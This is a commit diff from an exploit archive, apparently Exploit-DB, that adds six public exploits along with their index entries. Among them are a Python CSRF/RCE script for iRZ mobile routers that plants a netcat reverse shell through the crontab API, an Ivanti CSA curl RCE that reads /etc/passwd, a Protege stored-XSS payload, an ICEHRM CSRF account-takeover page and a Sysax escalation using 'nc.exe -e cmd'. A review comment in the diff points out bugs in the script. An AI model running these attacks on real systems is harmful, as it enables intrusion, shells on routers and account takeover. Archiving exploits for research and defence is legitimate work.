DB: 2022-03-23
6 changes to exploits/shellcodes Sysax FTP Automation 6.9.0 - Privilege Escalation iRZ Mobile Router - CSRF to RCE Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
This commit is contained in:
parent
62c4c0421c
commit
e55394b7d4
7 changed files with 466 additions and 0 deletions
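--- a/exploits/hardware/remote/50832.py
+++ b/exploits/hardware/remote/50832.py
@@ -0,0 +1,157 @@
+# Exploit Title: iRZ Mobile Router - CSRF to RCE
+# Google Dork: intitle:"iRZ Mobile Router"
+# Date: 2022-03-18
+# Exploit Author: Stephen Chavez & Robert Willis
+# Vendor Homepage: https://en.irz.ru/
+# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
+# Version: Routers through 2022-03-16
+# Tested on: RU21, RU21w, RL21, RU41, RL01
+# CVE : CVE-2022-27226
+
+import os
+import requests
+import json
+import subprocess
+
+option = "0"
+
+
+def main():
+    print("####################################################")
+    print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
+    print("####################################################")
+    print()
+    print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
+    print()
+    print("1. Post Authentication RCE (Needs Credentials)")
+    print("2. CSRF to RCE (No Credentials)")
+    print()
+    runit()
+
+
+def runit():
+    option = input("Select an option: ")
+    if option == "1":
+        exploit1()
+    elif option == "2":
+        exploit2()
+    else:
+        print("You must select '1' or '2'. Exiting.")
+
+
+def exploit1():
+    print("## Running Post Auth RCE exploit")
+    print()
+    print()
+    router_ip = input("## Enter the router ip to exploit: ")
+    router_port = int(
+        input("## Enter the victim router web page port (default is 80): ") or "80")
+
+    router_user = input("## Enter the username for the router login: ")
+    router_pass = input("## Enter the password for the router login: ")
+
+    LHOST = input("## Enter the LHOST for the router reverse shell: ")
+    LPORT = input("## Enter the LPORT for the router reverse shell: ")
+
+    router_url = f'http://{router_ip}:{router_port}'
+
+    nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
+
+    input(nc1_str + "\n\nPress enter once you do")
+
+    send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)
+
+
+def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
+
+    intro = f'Sending the payload to {router_url}\n'
+    print(intro)
+    payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
+        f'{lhost_ip} {lhost_port} ' + \
+        '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'
+
+    payload_json = json.loads(payload_str)
+
+    s = requests.Session()
+
+    s.auth = (router_user, router_pass)
+
+    s.headers.update(
+        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
+    s.headers.update({"X-Requested-With": "XMLHttpRequest"})
+    s.headers.update({"Origin": router_url})
+    s.headers.update({"Referer": router_url})
+
+    s.post(router_url + "/api/crontab", json=payload_json)
+
+    exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'
+
+    print(
+        "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
+    print("To fix TTY: type telnet 0.0.0.0 in the shell")
+
+
+def exploit2():
+
+    print("## Running CSRF to RCE exploit")
+    print()
+    print()
+    router_ip = input("## Enter the router ip to exploit: ")
+    router_port = int(
+        input("## Enter the victim router web page port (default is 80): ") or "80")
+
+    LHOST = input("## Enter the LHOST for the router reverse shell: ")
+    LPORT = input("## Enter the LPORT for the router reverse shell: ")
+
+    load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)
+
+
+def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
+
+    file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"
+
+    if os.path.isfile(file_path):
+        with open(file_path) as poc_file:
+            original_poc_data_str = poc_file.read()
+
+        new_html = original_poc_data_str.replace("{router_ip}", router_ip)
+        new_html = new_html.replace(
+            "{router_port}", str(router_port))
+
+        lhost_split_arr = lhost_ip.split(".")
+
+        if len(lhost_split_arr) == 4:
+
+            new_html = new_html.replace(
+                "{lhost_ip_octect_1}", lhost_split_arr[0])
+
+            new_html = new_html.replace(
+                "{lhost_ip_octect_2}", lhost_split_arr[1])
+
+            new_html = new_html.replace(
+                "{lhost_ip_octect_3}", lhost_split_arr[2])
+            new_html = new_html.replace(
+                "{lhost_ip_octect_4}", lhost_split_arr[3])
+
+            new_html = new_html.replace(
+                "{lhost_port}", lhost_port)
+
+            new_file_path = os.path.dirname(
+                __file__) + os.sep + "poc.new.html"
+            try:
+                with open(new_file_path, 'w') as new_file:
+                    new_file.write(new_html)
+
+                print()
+                print(
+                    f'New file written to {new_file_path}. Host this file')
+            except FileNotFoundError:
+                print("You had an error writing to the file, doesn't exist.")
+        else:
+            print(f'{lhost_ip} is not a proper IPV4 address.')
+
+    else:
+        print(f'{file_path} not found')
+
+
+main()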
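Review bot: Option 2 cannot work as committed: `load_csrf_poc_file` reads `poc.template.html` from the script's directory, but none of the seven files in this commit is that template, so the CSRF path always ends at `print(f'{file_path} not found')`. The path itself is built as `os.path.dirname(__file__) + os.sep + ...`, which on interpreters where `__file__` of the main script is relative (pre-3.9, run as `python 50832.py`) gives an empty dirname and the absolute path `/poc.template.html`; `os.path.join(os.path.dirname(os.path.abspath(__file__)), "poc.template.html")` (and likewise for `poc.new.html`) avoids that. In `send_json_payload` the result of `s.post(router_url + "/api/crontab", json=payload_json)` is discarded, so a 401/403 from bad credentials or a refused connection still prints "Request sent!"; keep the response as `resp` and call `resp.raise_for_status()` before reporting success. `import subprocess` and the module-level `option = "0"` are unused (`runit` shadows `option` locally).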
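--- a/exploits/hardware/remote/50835.txt
+++ b/exploits/hardware/remote/50835.txt
@@ -0,0 +1,116 @@
+# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: LiquidWorm
+
+Vendor: Integrated Control Technology Ltd.
+Product web page: https://www.ict.co
+Affected version: GX: Ver: 2.08.1002 K1B3
+Lib: 04.00.217
+Int: 2.3.235.J013
+OS: 2.0.20
+WX: Ver: 4.00 284 H062
+App: 02.08.766
+Lib: 04.00.169
+Int: 02.2.208
+
+Summary: Protege GX is an enterprise level integrated access control, intrusion
+detection and building automation solution with a feature set that is easy to
+operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
+web-based, cross-platform system that gives you a fully functional access control
+and intrusion detection solution in a fraction of the time of conventional software.
+With no software to install, setup is quick and simple. Connect the Controller and
+system components, then open a web browser to launch the intuitive wizard-driven
+interface which guides you through the process of configuring your system.
+
+Desc: The application suffers from an authenticated stored XSS vulnerability.
+The issue is triggered when input passed to the 'Name' parameter is not properly
+sanitized before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an
+affected site.
+
+Tested on: Microsoft-WinCE/6.00
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2022-5699
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php
+
+
+08.02.2022
+
+--
+
+
+UI navigation:
+--------------
+
+Scheduling > Daylight Savings > (Name field).
+
+
+Decrypted POST request:
+-----------------------
+
+POST /daylightsaving.htm
+
+Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1
+
+
+Encrypted GET request:
+----------------------
+
+http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6
+
+
+Additional info:
+----------------
+
+Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak
+The D3037E8A is the serial number of the onboard reader.
+
+Encrypt/Decrypt functions:
+--------------------------
+
+From console:
+> localStorage.getItem("WXKey")
+< '8EDB22D9FB767538'
+
+function encryptAES(a, c) {
+a = a.toString();
+a = unescape(encodeURIComponent(a));
+"undefined" == typeof c && (c = !0);
+if (0 == servertype)
+return a;
+var b = localStorage.getItem("WXKey");
+if ("" == b || null == b)
+return a;
+for (var d = "", e = 0; 16 > e; e++)
+d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
+a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
+return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
+}
+
+function decryptAES(a) {
+if (null == a)
+return "";
+a = a.toString();
+if ("<invalid session> < Packet not Init and not encrypted. >" == a)
+a = 0 == servertype ? "login.php" : "login.htm",
+window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
+else if ("<invalid session>" == a.substr(0, 17))
+a = 0 == servertype ? "login.php?logout" : "login.htm?logout",
+window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
+else {
+if (0 == servertype)
+return a;
+var c = localStorage.getItem("WXKey");
+if ("" == c)
+return a;
+a = hexToStr(a);
+var b = a.substr(0, 16);
+a = a.substr(16, a.length);
+a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
+a = removePKCS7(a);
+return a = decodeURIComponent(escape(a))
+}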
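--- a/exploits/hardware/remote/50836.txt
+++ b/exploits/hardware/remote/50836.txt
@@ -0,0 +1,52 @@
+# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
+# Exploit Author: LiquidWorm
+
+Vendor: Integrated Control Technology Ltd.
+Product web page: https://www.ict.co
+Affected version: GX: Ver: 2.08.1002 K1B3
+Lib: 04.00.217
+Int: 2.3.235.J013
+OS: 2.0.20
+WX: Ver: 4.00 284 H062
+App: 02.08.766
+Lib: 04.00.169
+Int: 02.2.208
+
+Summary: Protege GX is an enterprise level integrated access control, intrusion
+detection and building automation solution with a feature set that is easy to
+operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
+web-based, cross-platform system that gives you a fully functional access control
+and intrusion detection solution in a fraction of the time of conventional software.
+With no software to install, setup is quick and simple. Connect the Controller and
+system components, then open a web browser to launch the intuitive wizard-driven
+interface which guides you through the process of configuring your system.
+
+Desc: The application is vulnerable to improper access control that allows an
+authenticated operator to disclose SHA1 password hashes (client-side) of other
+users/operators.
+
+Tested on: Microsoft-WinCE/6.00
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2022-5700
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
+
+
+08.02.2022
+
+--
+
+
+Navigate to http://CONTROLLER_IP/operator.htm
+
+Source:
+
+<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
+...
+...
+<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
+...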
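--- a/exploits/multiple/remote/50833.txt
+++ b/exploits/multiple/remote/50833.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
+# Date: 20/03/2022
+# Exploit Author: d7x
+# Vendor Homepage: https://www.ivanti.com/
+# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
+# Version: CSA 4.6 4.5 - EOF Aug 2021
+# Tested on: Linux x86_64 # CVE : CVE-2021-44529
+# CVE : CVE-2021-44529
+
+###
+This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
+https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
+
+Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
+
+@d7x_real
+https://d7x.promiselabs.net
+https://www.promiselabs.net
+###
+
+# cat /etc/passwd
+curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
+
+# sleep for 10 seconds
+curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo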
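--- a/exploits/php/webapps/50831.txt
+++ b/exploits/php/webapps/50831.txt
@@ -0,0 +1,73 @@
+# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
+# Date: 18/03/2022
+# Exploit Author: Devansh Bordia
+# Vendor Homepage: https://icehrm.com/
+# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
+# Version: 31.0.0.OS
+#Tested on: Windows 10
+
+1. About - ICEHRM
+IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
+
+2. Description:
+The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
+
+3. Steps To Reproduce:
+- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password.
+- Now login into the application using his credentials and navigate to Update Password Feature to change the password.
+- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used.
+- Finally using Burpsuite create CSRF POC and save it as exploit.html.
+- Now change the password in the POC to any password we want.
+- Finally we open this POC in the same browser session and click on the submit button.
+- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover.
+
+4. Vulnerable Request:
+
+GET
+/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123
+","pwd":"Dummy@123"} HTTP/1.1
+Host: localhost:8070
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
+Gecko/20100101 Firefox/98.0
+Accept: application/json, text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer:
+http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information
+Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+5. Exploit POC (exploit.html)
+
+<html>
+
+<!-- CSRF PoC - generated by Burp Suite Professional -->
+
+<body>
+
+<script>history.pushState('', '', '/')</script>
+
+<form action="http://localhost:8070/app/service.php">
+
+<input type="hidden" name="t" value="Employee" />
+
+<input type="hidden" name="a" value="ca" />
+
+<input type="hidden" name="sa" value="changePassword" />
+
+<input type="hidden" name="mod" value="modules=employees" />
+
+<input type="hidden" name="req"
+value="{"current":"Test@123","pwd":"Dummy@123"}"
+/>
+
+<input type="submit" value="Submit request" />
+
+</form>
+
+</body>
+
+</html>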
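--- a/exploits/windows/local/50834.txt
+++ b/exploits/windows/local/50834.txt
@@ -0,0 +1,37 @@
+# Exploit Author: bzyo (@bzyo_)
+# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
+# Date: 03-20-2022
+# Vulnerable Software: Sysax FTP Automation 6.9.0
+# Vendor Homepage: https://www.sysax.com/
+# Version: 6.9.0
+# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
+# Tested on: Windows 10 x64
+
+# Details:
+Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system.
+
+# Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account
+
+# Exploit:
+Logged in as low privileged account
+
+1. Create folder c:\temp
+2. Download netcat (nc.exe) to c:\temp
+3. Create file 'pwn.bat' in c:\temp with contents
+c:\temp\nc.exe localhost 1337 -e cmd
+4. Open command prompt and netcat listener
+nc -nlvvp 1337
+5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
+6. Select Setup Scheduled/Triggered Tasks
+- Add task (Triggered)
+- Update folder to monitor to be c:\temp
+- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
+- Choose 'Run any other Program' and choose c:\temp\pwn.bat
+- Uncheck 'Login as the following user to run task'
+- Finish and Save
+7. Create new text file in c:\temp
+8. Check netcat listener
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system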
|
@ -11472,6 +11472,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||||
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||||
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
|
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
|
||||||
|
50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -18650,6 +18651,10 @@ id,file,description,date,author,type,platform,port
|
||||||
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
|
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
|
||||||
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
|
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
|
||||||
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
|
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
|
||||||
|
50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"John Jackson",remote,hardware,
|
||||||
|
50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
|
||||||
|
50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
|
50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
||||||
|
@ -44896,5 +44901,6 @@ id,file,description,date,author,type,platform,port
|
||||||
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
|
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
|
||||||
50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
|
50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
|
||||||
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
|
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
|
||||||
|
50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
|
||||||
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
|
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
|
||||||
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
|
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
|
||||||
|
|